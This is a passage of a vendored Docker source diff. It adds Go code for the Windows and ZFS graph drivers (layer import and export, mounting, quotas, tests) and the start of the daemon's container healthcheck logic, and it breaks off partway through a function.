+func (d *Driver) Changes(id, parent string) ([]archive.Change, error) { + rID, err := d.resolveID(id) + if err != nil { + return nil, err + } + parentChain, err := d.getLayerChain(rID) + if err != nil { + return nil, err + } + + if err := hcsshim.ActivateLayer(d.info, rID); err != nil { + return nil, err + } + defer func() { + if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil { + logrus.Errorf("changes() failed to DeactivateLayer %s %s: %s", id, rID, err2) + } + }() + + var changes []archive.Change + err = winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + r, err := hcsshim.NewLayerReader(d.info, id, parentChain) + if err != nil { + return err + } + defer r.Close() + + for { + name, _, fileInfo, err := r.Next() + if err == io.EOF { + return nil + } + if err != nil { + return err + } + name = filepath.ToSlash(name) + if fileInfo == nil { + changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeDelete}) + } else { + // Currently there is no way to tell between an add and a modify. + changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeModify}) + } + } + }) + if err != nil { + return nil, err + } + + return changes, nil +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +// The layer should not be mounted when calling this function +func (d *Driver) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + var layerChain []string + if parent != "" { + rPId, err := d.resolveID(parent) + if err != nil { + return 0, err + } + parentChain, err := d.getLayerChain(rPId) + if err != nil { + return 0, err + } + parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId) + if err != nil { + return 0, err + } + layerChain = append(layerChain, parentPath) + layerChain = append(layerChain, parentChain...) 
+ } + + size, err := d.importLayer(id, diff, layerChain) + if err != nil { + return 0, err + } + + if err = d.setLayerChain(id, layerChain); err != nil { + return 0, err + } + + return size, nil +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (d *Driver) DiffSize(id, parent string) (size int64, err error) { + rPId, err := d.resolveID(parent) + if err != nil { + return + } + + changes, err := d.Changes(id, rPId) + if err != nil { + return + } + + layerFs, err := d.Get(id, "") + if err != nil { + return + } + defer d.Put(id) + + return archive.ChangesSize(layerFs, changes), nil +} + +// GetMetadata returns custom driver information. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + m := make(map[string]string) + m["dir"] = d.dir(id) + return m, nil +} + +func writeTarFromLayer(r hcsshim.LayerReader, w io.Writer) error { + t := tar.NewWriter(w) + for { + name, size, fileInfo, err := r.Next() + if err == io.EOF { + break + } + if err != nil { + return err + } + if fileInfo == nil { + // Write a whiteout file. + hdr := &tar.Header{ + Name: filepath.ToSlash(filepath.Join(filepath.Dir(name), archive.WhiteoutPrefix+filepath.Base(name))), + } + err := t.WriteHeader(hdr) + if err != nil { + return err + } + } else { + err = backuptar.WriteTarFileFromBackupStream(t, r, name, size, fileInfo) + if err != nil { + return err + } + } + } + return t.Close() +} + +// exportLayer generates an archive from a layer based on the given ID. 
+func (d *Driver) exportLayer(id string, parentLayerPaths []string) (io.ReadCloser, error) { + archive, w := io.Pipe() + go func() { + err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + r, err := hcsshim.NewLayerReader(d.info, id, parentLayerPaths) + if err != nil { + return err + } + + err = writeTarFromLayer(r, w) + cerr := r.Close() + if err == nil { + err = cerr + } + return err + }) + w.CloseWithError(err) + }() + + return archive, nil +} + +// writeBackupStreamFromTarAndSaveMutatedFiles reads data from a tar stream and +// writes it to a backup stream, and also saves any files that will be mutated +// by the import layer process to a backup location. +func writeBackupStreamFromTarAndSaveMutatedFiles(buf *bufio.Writer, w io.Writer, t *tar.Reader, hdr *tar.Header, root string) (nextHdr *tar.Header, err error) { + var bcdBackup *os.File + var bcdBackupWriter *winio.BackupFileWriter + if backupPath, ok := mutatedFiles[hdr.Name]; ok { + bcdBackup, err = os.Create(filepath.Join(root, backupPath)) + if err != nil { + return nil, err + } + defer func() { + cerr := bcdBackup.Close() + if err == nil { + err = cerr + } + }() + + bcdBackupWriter = winio.NewBackupFileWriter(bcdBackup, false) + defer func() { + cerr := bcdBackupWriter.Close() + if err == nil { + err = cerr + } + }() + + buf.Reset(io.MultiWriter(w, bcdBackupWriter)) + } else { + buf.Reset(w) + } + + defer func() { + ferr := buf.Flush() + if err == nil { + err = ferr + } + }() + + return backuptar.WriteBackupStreamFromTarFile(buf, t, hdr) +} + +func writeLayerFromTar(r io.Reader, w hcsshim.LayerWriter, root string) (int64, error) { + t := tar.NewReader(r) + hdr, err := t.Next() + totalSize := int64(0) + buf := bufio.NewWriter(nil) + for err == nil { + base := path.Base(hdr.Name) + if strings.HasPrefix(base, archive.WhiteoutPrefix) { + name := path.Join(path.Dir(hdr.Name), base[len(archive.WhiteoutPrefix):]) + err = w.Remove(filepath.FromSlash(name)) + if err != nil { + return 0, err + } 
+ hdr, err = t.Next() + } else if hdr.Typeflag == tar.TypeLink { + err = w.AddLink(filepath.FromSlash(hdr.Name), filepath.FromSlash(hdr.Linkname)) + if err != nil { + return 0, err + } + hdr, err = t.Next() + } else { + var ( + name string + size int64 + fileInfo *winio.FileBasicInfo + ) + name, size, fileInfo, err = backuptar.FileInfoFromHeader(hdr) + if err != nil { + return 0, err + } + err = w.Add(filepath.FromSlash(name), fileInfo) + if err != nil { + return 0, err + } + hdr, err = writeBackupStreamFromTarAndSaveMutatedFiles(buf, w, t, hdr, root) + totalSize += size + } + } + if err != io.EOF { + return 0, err + } + return totalSize, nil +} + +// importLayer adds a new layer to the tag and graph store based on the given data. +func (d *Driver) importLayer(id string, layerData io.Reader, parentLayerPaths []string) (size int64, err error) { + if !noreexec { + cmd := reexec.Command(append([]string{"docker-windows-write-layer", d.info.HomeDir, id}, parentLayerPaths...)...) + output := bytes.NewBuffer(nil) + cmd.Stdin = layerData + cmd.Stdout = output + cmd.Stderr = output + + if err = cmd.Start(); err != nil { + return + } + + if err = cmd.Wait(); err != nil { + return 0, fmt.Errorf("re-exec error: %v: output: %s", err, output) + } + + return strconv.ParseInt(output.String(), 10, 64) + } + return writeLayer(layerData, d.info.HomeDir, id, parentLayerPaths...) +} + +// writeLayerReexec is the re-exec entry point for writing a layer from a tar file +func writeLayerReexec() { + size, err := writeLayer(os.Stdin, os.Args[1], os.Args[2], os.Args[3:]...) + if err != nil { + fmt.Fprint(os.Stderr, err) + os.Exit(1) + } + fmt.Fprint(os.Stdout, size) +} + +// writeLayer writes a layer from a tar file. 
+func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) { + err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}) + if err != nil { + return 0, err + } + if noreexec { + defer func() { + if err := winio.DisableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}); err != nil { + // This should never happen, but just in case when in debugging mode. + // See https://github.com/docker/docker/pull/28002#discussion_r86259241 for rationale. + panic("Failed to disabled process privileges while in non re-exec mode") + } + }() + } + + info := hcsshim.DriverInfo{ + Flavour: filterDriver, + HomeDir: home, + } + + w, err := hcsshim.NewLayerWriter(info, id, parentLayerPaths) + if err != nil { + return 0, err + } + + size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id)) + if err != nil { + return 0, err + } + + err = w.Close() + if err != nil { + return 0, err + } + + return size, nil +} + +// resolveID computes the layerID information based on the given id. +func (d *Driver) resolveID(id string) (string, error) { + content, err := ioutil.ReadFile(filepath.Join(d.dir(id), "layerID")) + if os.IsNotExist(err) { + return id, nil + } else if err != nil { + return "", err + } + return string(content), nil +} + +// setID stores the layerId in disk. +func (d *Driver) setID(id, altID string) error { + err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) + if err != nil { + return err + } + return nil +} + +// getLayerChain returns the layer chain information. 
+func (d *Driver) getLayerChain(id string) ([]string, error) { + jPath := filepath.Join(d.dir(id), "layerchain.json") + content, err := ioutil.ReadFile(jPath) + if os.IsNotExist(err) { + return nil, nil + } else if err != nil { + return nil, fmt.Errorf("Unable to read layerchain file - %s", err) + } + + var layerChain []string + err = json.Unmarshal(content, &layerChain) + if err != nil { + return nil, fmt.Errorf("Failed to unmarshall layerchain json - %s", err) + } + + return layerChain, nil +} + +// setLayerChain stores the layer chain information in disk. +func (d *Driver) setLayerChain(id string, chain []string) error { + content, err := json.Marshal(&chain) + if err != nil { + return fmt.Errorf("Failed to marshall layerchain json - %s", err) + } + + jPath := filepath.Join(d.dir(id), "layerchain.json") + err = ioutil.WriteFile(jPath, content, 0600) + if err != nil { + return fmt.Errorf("Unable to write layerchain file - %s", err) + } + + return nil +} + +type fileGetCloserWithBackupPrivileges struct { + path string +} + +func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser, error) { + if backupPath, ok := mutatedFiles[filename]; ok { + return os.Open(filepath.Join(fg.path, backupPath)) + } + + var f *os.File + // Open the file while holding the Windows backup privilege. This ensures that the + // file can be opened even if the caller does not actually have access to it according + // to the security descriptor. 
+ err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { + path := longpath.AddPrefix(filepath.Join(fg.path, filename)) + p, err := syscall.UTF16FromString(path) + if err != nil { + return err + } + h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + if err != nil { + return &os.PathError{Op: "open", Path: path, Err: err} + } + f = os.NewFile(uintptr(h), path) + return nil + }) + return f, err +} + +func (fg *fileGetCloserWithBackupPrivileges) Close() error { + return nil +} + +// DiffGetter returns a FileGetCloser that can read files from the directory that +// contains files for the layer differences. Used for direct access for tar-split. +func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + id, err := d.resolveID(id) + if err != nil { + return nil, err + } + + return &fileGetCloserWithBackupPrivileges{d.dir(id)}, nil +} + +type storageOptions struct { + size uint64 +} + +func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) { + options := storageOptions{} + + // Read size to change the block device size per container. 
+ for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + options.size = uint64(size) + default: + return nil, fmt.Errorf("Unknown storage option: %s", key) + } + } + return &options, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS new file mode 100644 index 0000000000..9c270c541f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS @@ -0,0 +1,2 @@ +Jörg Thalheim (@Mic92) +Arthur Gautier (@baloose) diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go new file mode 100644 index 0000000000..8e283ccf40 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go @@ -0,0 +1,417 @@ +// +build linux freebsd solaris + +package zfs + +import ( + "fmt" + "os" + "os/exec" + "path" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + zfs "github.com/mistifyio/go-zfs" + "github.com/opencontainers/runc/libcontainer/label" +) + +type zfsOptions struct { + fsName string + mountPath string +} + +func init() { + graphdriver.Register("zfs", Init) +} + +// Logger returns a zfs logger implementation. +type Logger struct{} + +// Log wraps log message from ZFS driver with a prefix '[zfs]'. +func (*Logger) Log(cmd []string) { + logrus.Debugf("[zfs] %s", strings.Join(cmd, " ")) +} + +// Init returns a new ZFS driver. +// It takes base mount path and an array of options which are represented as key value pairs. +// Each option is in the for key=value. 'zfs.fsname' is expected to be a valid key in the options. 
+func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + var err error + + if _, err := exec.LookPath("zfs"); err != nil { + logrus.Debugf("[zfs] zfs command is not available: %v", err) + return nil, graphdriver.ErrPrerequisites + } + + file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600) + if err != nil { + logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err) + return nil, graphdriver.ErrPrerequisites + } + defer file.Close() + + options, err := parseOptions(opt) + if err != nil { + return nil, err + } + options.mountPath = base + + rootdir := path.Dir(base) + + if options.fsName == "" { + err = checkRootdirFs(rootdir) + if err != nil { + return nil, err + } + } + + if options.fsName == "" { + options.fsName, err = lookupZfsDataset(rootdir) + if err != nil { + return nil, err + } + } + + zfs.SetLogger(new(Logger)) + + filesystems, err := zfs.Filesystems(options.fsName) + if err != nil { + return nil, fmt.Errorf("Cannot find root filesystem %s: %v", options.fsName, err) + } + + filesystemsCache := make(map[string]bool, len(filesystems)) + var rootDataset *zfs.Dataset + for _, fs := range filesystems { + if fs.Name == options.fsName { + rootDataset = fs + } + filesystemsCache[fs.Name] = true + } + + if rootDataset == nil { + return nil, fmt.Errorf("BUG: zfs get all -t filesystem -rHp '%s' should contain '%s'", options.fsName, options.fsName) + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, fmt.Errorf("Failed to get root uid/guid: %v", err) + } + if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil { + return nil, fmt.Errorf("Failed to create '%s': %v", base, err) + } + + if err := mount.MakePrivate(base); err != nil { + return nil, err + } + d := &Driver{ + dataset: rootDataset, + options: options, + filesystemsCache: filesystemsCache, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewDefaultChecker()), + } + 
return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil +} + +func parseOptions(opt []string) (zfsOptions, error) { + var options zfsOptions + options.fsName = "" + for _, option := range opt { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return options, err + } + key = strings.ToLower(key) + switch key { + case "zfs.fsname": + options.fsName = val + default: + return options, fmt.Errorf("Unknown option %s", key) + } + } + return options, nil +} + +func lookupZfsDataset(rootdir string) (string, error) { + var stat syscall.Stat_t + if err := syscall.Stat(rootdir, &stat); err != nil { + return "", fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + wantedDev := stat.Dev + + mounts, err := mount.GetMounts() + if err != nil { + return "", err + } + for _, m := range mounts { + if err := syscall.Stat(m.Mountpoint, &stat); err != nil { + logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) + continue // may fail on fuse file systems + } + + if stat.Dev == wantedDev && m.Fstype == "zfs" { + return m.Source, nil + } + } + + return "", fmt.Errorf("Failed to find zfs dataset mounted on '%s' in /proc/mounts", rootdir) +} + +// Driver holds information about the driver, such as zfs dataset, options and cache. +type Driver struct { + dataset *zfs.Dataset + options zfsOptions + sync.Mutex // protects filesystem cache against concurrent access + filesystemsCache map[string]bool + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter +} + +func (d *Driver) String() string { + return "zfs" +} + +// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +func (d *Driver) Cleanup() error { + return nil +} + +// Status returns information about the ZFS filesystem. It returns a two dimensional array of information +// such as pool name, dataset name, disk usage, parent quota and compression used. 
+// Currently it return 'Zpool', 'Zpool Health', 'Parent Dataset', 'Space Used By Parent', +// 'Space Available', 'Parent Quota' and 'Compression'. +func (d *Driver) Status() [][2]string { + parts := strings.Split(d.dataset.Name, "/") + pool, err := zfs.GetZpool(parts[0]) + + var poolName, poolHealth string + if err == nil { + poolName = pool.Name + poolHealth = pool.Health + } else { + poolName = fmt.Sprintf("error while getting pool information %v", err) + poolHealth = "not available" + } + + quota := "no" + if d.dataset.Quota != 0 { + quota = strconv.FormatUint(d.dataset.Quota, 10) + } + + return [][2]string{ + {"Zpool", poolName}, + {"Zpool Health", poolHealth}, + {"Parent Dataset", d.dataset.Name}, + {"Space Used By Parent", strconv.FormatUint(d.dataset.Used, 10)}, + {"Space Available", strconv.FormatUint(d.dataset.Avail, 10)}, + {"Parent Quota", quota}, + {"Compression", d.dataset.Compression}, + } +} + +// GetMetadata returns image/container metadata related to graph driver +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +func (d *Driver) cloneFilesystem(name, parentName string) error { + snapshotName := fmt.Sprintf("%d", time.Now().Nanosecond()) + parentDataset := zfs.Dataset{Name: parentName} + snapshot, err := parentDataset.Snapshot(snapshotName /*recursive */, false) + if err != nil { + return err + } + + _, err = snapshot.Clone(name, map[string]string{"mountpoint": "legacy"}) + if err == nil { + d.Lock() + d.filesystemsCache[name] = true + d.Unlock() + } + + if err != nil { + snapshot.Destroy(zfs.DestroyDeferDeletion) + return err + } + return snapshot.Destroy(zfs.DestroyDeferDeletion) +} + +func (d *Driver) zfsPath(id string) string { + return d.options.fsName + "/" + id +} + +func (d *Driver) mountPath(id string) string { + return path.Join(d.options.mountPath, "graph", getMountpoint(id)) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. 
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create prepares the dataset and filesystem for the ZFS driver for the given id under the parent. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + err := d.create(id, parent, storageOpt) + if err == nil { + return nil + } + if zfsError, ok := err.(*zfs.Error); ok { + if !strings.HasSuffix(zfsError.Stderr, "dataset already exists\n") { + return err + } + // aborted build -> cleanup + } else { + return err + } + + dataset := zfs.Dataset{Name: d.zfsPath(id)} + if err := dataset.Destroy(zfs.DestroyRecursiveClones); err != nil { + return err + } + + // retry + return d.create(id, parent, storageOpt) +} + +func (d *Driver) create(id, parent string, storageOpt map[string]string) error { + name := d.zfsPath(id) + quota, err := parseStorageOpt(storageOpt) + if err != nil { + return err + } + if parent == "" { + mountoptions := map[string]string{"mountpoint": "legacy"} + fs, err := zfs.CreateFilesystem(name, mountoptions) + if err == nil { + err = setQuota(name, quota) + if err == nil { + d.Lock() + d.filesystemsCache[fs.Name] = true + d.Unlock() + } + } + return err + } + err = d.cloneFilesystem(name, d.zfsPath(parent)) + if err == nil { + err = setQuota(name, quota) + } + return err +} + +func parseStorageOpt(storageOpt map[string]string) (string, error) { + // Read size to change the disk quota per container + for k, v := range storageOpt { + key := strings.ToLower(k) + switch key { + case "size": + return v, nil + default: + return "0", fmt.Errorf("Unknown option %s", key) + } + } + return "0", nil +} + +func setQuota(name string, quota string) error { + if quota == "0" { + return nil + } + fs, err := zfs.GetDataset(name) + if err != nil { + return err + } + return fs.SetProperty("quota", quota) +} + +// Remove 
deletes the dataset, filesystem and the cache for the given id. +func (d *Driver) Remove(id string) error { + name := d.zfsPath(id) + dataset := zfs.Dataset{Name: name} + err := dataset.Destroy(zfs.DestroyRecursive) + if err == nil { + d.Lock() + delete(d.filesystemsCache, name) + d.Unlock() + } + return err +} + +// Get returns the mountpoint for the given id after creating the target directories if necessary. +func (d *Driver) Get(id, mountLabel string) (string, error) { + mountpoint := d.mountPath(id) + if count := d.ctr.Increment(mountpoint); count > 1 { + return mountpoint, nil + } + + filesystem := d.zfsPath(id) + options := label.FormatMountLabel("", mountLabel) + logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + d.ctr.Decrement(mountpoint) + return "", err + } + // Create the target directories if they don't exist + if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil { + d.ctr.Decrement(mountpoint) + return "", err + } + + if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil { + d.ctr.Decrement(mountpoint) + return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) + } + + // this could be our first mount after creation of the filesystem, and the root dir may still have root + // permissions instead of the remapped root uid:gid (if user namespaces are enabled): + if err := os.Chown(mountpoint, rootUID, rootGID); err != nil { + mount.Unmount(mountpoint) + d.ctr.Decrement(mountpoint) + return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) + } + + return mountpoint, nil +} + +// Put removes the existing mountpoint for the given id if it exists. 
+func (d *Driver) Put(id string) error { + mountpoint := d.mountPath(id) + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint) + if err != nil || !mounted { + return err + } + + logrus.Debugf(`[zfs] unmount("%s")`, mountpoint) + + if err := mount.Unmount(mountpoint); err != nil { + return fmt.Errorf("error unmounting to %s: %v", mountpoint, err) + } + return nil +} + +// Exists checks to see if the cache entry exists for the given id. +func (d *Driver) Exists(id string) bool { + d.Lock() + defer d.Unlock() + return d.filesystemsCache[d.zfsPath(id)] == true +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go new file mode 100644 index 0000000000..1c05fa794c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go @@ -0,0 +1,38 @@ +package zfs + +import ( + "fmt" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + var buf syscall.Statfs_t + if err := syscall.Statfs(rootdir, &buf); err != nil { + return fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + + // on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... 
] + if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + return graphdriver.ErrPrerequisites + } + + return nil +} + +func getMountpoint(id string) string { + maxlen := 12 + + // we need to preserve filesystem suffix + suffix := strings.SplitN(id, "-", 2) + + if len(suffix) > 1 { + return id[:maxlen] + "-" + suffix[1] + } + + return id[:maxlen] +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go new file mode 100644 index 0000000000..52ed516049 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go @@ -0,0 +1,27 @@ +package zfs + +import ( + "fmt" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + var buf syscall.Statfs_t + if err := syscall.Statfs(rootdir, &buf); err != nil { + return fmt.Errorf("Failed to access '%s': %s", rootdir, err) + } + + if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + return graphdriver.ErrPrerequisites + } + + return nil +} + +func getMountpoint(id string) string { + return id +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go new file mode 100644 index 0000000000..bb4a85bd64 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go @@ -0,0 +1,59 @@ +// +build solaris,cgo + +package zfs + +/* +#include +#include + +static inline struct statvfs *getstatfs(char *s) { + struct statvfs *buf; + int err; + buf = (struct statvfs *)malloc(sizeof(struct statvfs)); + err = statvfs(s, buf); + return buf; +} +*/ +import "C" +import ( + "path/filepath" + "strings" + 
"unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" +) + +func checkRootdirFs(rootdir string) error { + + cs := C.CString(filepath.Dir(rootdir)) + buf := C.getstatfs(cs) + + // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] + if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || + (buf.f_basetype[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + C.free(unsafe.Pointer(buf)) + return graphdriver.ErrPrerequisites + } + + C.free(unsafe.Pointer(buf)) + C.free(unsafe.Pointer(cs)) + return nil +} + +/* rootfs is introduced to comply with the OCI spec +which states that root filesystem must be mounted at /rootfs/ instead of / +*/ +func getMountpoint(id string) string { + maxlen := 12 + + // we need to preserve filesystem suffix + suffix := strings.SplitN(id, "-", 2) + + if len(suffix) > 1 { + return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root") + } + + return filepath.Join(id[:maxlen], "rootfs", "root") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go new file mode 100644 index 0000000000..3e22928438 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go @@ -0,0 +1,35 @@ +// +build linux + +package zfs + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestZfsSetup and TestZfsTeardown +func TestZfsSetup(t *testing.T) { + graphtest.GetDriver(t, "zfs") +} + +func TestZfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "zfs") +} + +func TestZfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "zfs") +} + +func TestZfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "zfs") +} + +func TestZfsSetQuota(t *testing.T) { + 
graphtest.DriverTestSetQuota(t, "zfs") +} + +func TestZfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go new file mode 100644 index 0000000000..ce8daadaf6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go @@ -0,0 +1,11 @@ +// +build !linux,!freebsd,!solaris + +package zfs + +func checkRootdirFs(rootdir string) error { + return nil +} + +func getMountpoint(id string) string { + return id +} diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go new file mode 100644 index 0000000000..5b01dc0f40 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/health.go @@ -0,0 +1,341 @@ +package daemon + +import ( + "bytes" + "fmt" + "runtime" + "strings" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +const ( + // Longest healthcheck probe output message to store. Longer messages will be truncated. + maxOutputLen = 4096 + + // Default interval between probe runs (from the end of the first to the start of the second). + // Also the time before the first probe. + defaultProbeInterval = 30 * time.Second + + // The maximum length of time a single probe run should take. If the probe takes longer + // than this, the check is considered to have failed. + defaultProbeTimeout = 30 * time.Second + + // Default number of consecutive failures of the health check + // for the container to be considered unhealthy. 
+ defaultProbeRetries = 3 + + // Maximum number of entries to record + maxLogEntries = 5 +) + +const ( + // Exit status codes that can be returned by the probe command. + + exitStatusHealthy = 0 // Container is healthy + exitStatusUnhealthy = 1 // Container is unhealthy +) + +// probe implementations know how to run a particular type of probe. +type probe interface { + // Perform one run of the check. Returns the exit code and an optional + // short diagnostic string. + run(context.Context, *Daemon, *container.Container) (*types.HealthcheckResult, error) +} + +// cmdProbe implements the "CMD" probe type. +type cmdProbe struct { + // Run the command with the system's default shell instead of execing it directly. + shell bool +} + +// exec the healthcheck command in the container. +// Returns the exit code and probe output (if any) +func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) { + + cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:] + if p.shell { + cmdSlice = append(getShell(container.Config), cmdSlice...) 
+ } + entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice) + execConfig := exec.NewConfig() + execConfig.OpenStdin = false + execConfig.OpenStdout = true + execConfig.OpenStderr = true + execConfig.ContainerID = container.ID + execConfig.DetachKeys = []byte{} + execConfig.Entrypoint = entrypoint + execConfig.Args = args + execConfig.Tty = false + execConfig.Privileged = false + execConfig.User = container.Config.User + + d.registerExecCommand(container, execConfig) + d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + + output := &limitedBuffer{} + err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) + if err != nil { + return nil, err + } + info, err := d.getExecConfig(execConfig.ID) + if err != nil { + return nil, err + } + if info.ExitCode == nil { + return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID) + } + // Note: Go's json package will handle invalid UTF-8 for us + out := output.String() + return &types.HealthcheckResult{ + End: time.Now(), + ExitCode: *info.ExitCode, + Output: out, + }, nil +} + +// Update the container's Status.Health struct based on the latest probe's result. +func handleProbeResult(d *Daemon, c *container.Container, result *types.HealthcheckResult, done chan struct{}) { + c.Lock() + defer c.Unlock() + + // probe may have been cancelled while waiting on lock. 
